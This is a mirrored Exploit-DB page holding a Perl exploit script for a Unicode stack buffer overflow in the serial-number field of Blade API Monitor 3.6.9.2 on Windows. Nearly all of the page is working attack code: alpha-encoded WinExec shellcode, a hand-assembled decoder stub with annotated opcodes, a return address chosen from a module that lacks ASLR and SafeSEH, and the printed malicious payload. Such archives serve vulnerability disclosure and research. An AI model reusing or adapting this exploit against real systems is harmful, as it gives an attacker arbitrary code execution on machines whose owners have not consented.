Blade API Monitor 3.6.9.2 – Unicode Stack Buffer Overflow - 体验盒子

作者： FullMetalFouad
日期： 2012-01-10
类别：
local
平台：
windows
来源：https://www.exploit-db.com/exploits/18349/
# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################

my $file= "bof_blade.txt";

# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
"hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J".
"0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I".
"2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W".
"0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p".
"034r032m334t3w3m02";

# 
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF"	;# sub eax, 30A
# "\x33\xDB"			;# xor ebx,ebx
# "\x33\xC9"			;# xor ecx,ecx
# "\xFE\xC5"			;# inc ch
# 
# "\x43"				;# inc ebx
# "\x8A\x14\x58"			;# mov dl, [eax+ebx*2]
# "\x88\x14\x18"			;# mov [eax+ebx], dl
# "\xE2\xF7"				;# loop 
# "\xFF\xE0"				;# jmp eax
my $shellcode ="hffffk4diFkTpk02Tpl0T0Bu".
				 "EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";


my $junk1 = "\xCC" x 104;
$junk1 = $junk1 ."\x35" x 2; # ECX
$junk1 = $junk1 ."\x41" x 6; # EBP

my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2 = "\x42" x 20;
my $buffer = "\x41" x 246;

my $finder = ""; 
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";

# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
									#	_part_0_:__________________________________________________
$part0 = $part0. "\x53"; 	# | 53push ebx |
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\xBA\x58\x58";	#	| BA00580058mov edx, 58005800|
$part0 = $part0. "\x45";	#	| 004500add [ebp+0x0],al |
$part0 = $part0. "\x54"; 	# | 54push esp |
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x5F"; 	# | 5Fpop edi|
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\xB9\x3B\x3B";	# | B9003B003Bmov ecx, 3B003B00(diff)|
$part0 = $part0. "\xF5"; 	# | 00F5add ch,dh|
$part0 = $part0. "\x6F"; 	# | 006F00add [edi+0x0],ch |
$part0 = $part0. "\xD6"; 	# | D6salc |
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x5B"; 	# | 5Bpop ebx|
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x50"; 	# | 50push eax |
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x54"; 	# | 54push esp |
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x58"; 	# | 58pop eax|
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\xC1\x19"; 	# | C10019rol dword ptr [eax], 19|
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x58"; 	# | 58pop eax|
$part0 = $part0. "\xC7"; 	# | 00C7add bh,al|
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x53"; 	# | 53push ebx |
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x58"; 	# | 58pop eax|
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
$part0 = $part0. "\x52"; 	# | 52push edx |
$part0 = $part0. "\x45"; 	# | 004500add [ebp+0x0],al(nop)|
##################################### |__________________________________________________________|


# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
									#	_part_1_:__________________________________________________
$part1 = $part1. "\x6A";			# | 6A00push dword 0x00000000|
$part1 = $part1. "\x6A";	# | 6A00push dword 0x00000000|
$part1 = $part1. "\x5B";	# | 5Bpop ebx|
$part1 = $part1. "\x45";	# | 004500add [ebp+0x0],al(nop)|
$part1 = $part1. "\x59";	# | 59pop ecx|
$part1 = $part1. "\x45";	# | 004500add [ebp+0x0],al(nop)|
$part1 = $part1. "\xBA\x01\x41";	# | BA00010041mov edx,0x41000100 |
$part1 = $part1. "\xF5";	# | 00F5add ch,dh|
##################################### |__________________________________________________________|

# 2nd part : The patching of the 'loop code' :
									#	_part_2_:__________________________________________________
$part2 = $part2. "\x45";	#	| 004500add [ebp+0x0],al |
$part2 = $part2. "\x5A";	# | 5Apop edx|
$part2 = $part2. "\x45";	#	| 004500add [ebp+0x0],al |
$part2 = $part2. "\xC6\x32";# | C60032mov byte [eax],0x32 ; 0x8A-0x58|
$part2 = $part2. "\x70";# | 007000add [eax+0x0],dh |
$part2 = $part2. "\x40";# | 40inc eax|
$part2 = $part2. "\x45";# | 004500add [ebp+0x0],al |
$part2 = $part2. "\x40";	# | 40inc eax|
$part2 = $part2. "\x70";	# | 007000add [eax+0x0],dh; 0x58 |
$part2 = $part2. "\x40";# | 40inc eax|
$part2 = $part2. "\x70";	# | 007000add [eax+0x0],dh; 0x88dh=58|
$part2 = $part2. "\x40";# | 40inc eax|
$part2 = $part2. "\x45";# | 004500add [ebp+0x0],al |
$part2 = $part2. "\xC6\x14";# | C60014mov byte [eax],0x14 ; 0x14 |
$part2 = $part2. "\x45";# | 004500add [ebp+0x0],al |
$part2 = $part2. "\x40";		# | 40inc eax|
$part2 = $part2. "\x45";		# | 004500add [ebp+0x0],al |
$part2 = $part2. "\x40";			# | 40inc eax|
$part2 = $part2. "\x45";			# | 004500add [ebp+0x0],al |
$part2 = $part2. "\xC6\xE2";		# | C600E2mov byte [eax],0xE2 ; 0xE2 |
$part2 = $part2. "\x45";			# | 004500add [ebp+0x0],al |
$part2 = $part2. "\x40";# | 40inc eax|
$part2 = $part2. "\x45";# | 004500add [ebp+0x0],al |
# |__________________________________________________________|

# 3rd part : The loop code (stuffed with nulls of course)
									#	_part_3_:___________________________________________________
									#	| ; eax points to our shellcode|
									#	| ; ebx is 0x00000000|
									#	| ; ecx is 0x00000500 (for example)|
									#	||
									#	| label: |
$part3 = $part3. "\x43";	 	#	| 43inc ebx|
$part3 = $part3. "\x14"; 	#	| 8A1458mov byte dl,[eax+2*ebx]|
$part3 = $part3. "\x30\x18"; 	#	| 881418mov byte [eax+ebx],dl|
$part3 = $part3. "\xF7"; 	#	| E2F7loop label |
									#	|__________________________________________________________|

$finder = $part0.$part1.$part2.$part3;

open($FILE,">$file");
print $FILE $shellcode_calc.$junk1.$eip.$junk2.$finder.$shellcode."\xFF\xFF\xFF\xFF".$buffer."\x43\x43\x43\x43";
close($FILE);
print "File Created successfully\n";

# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC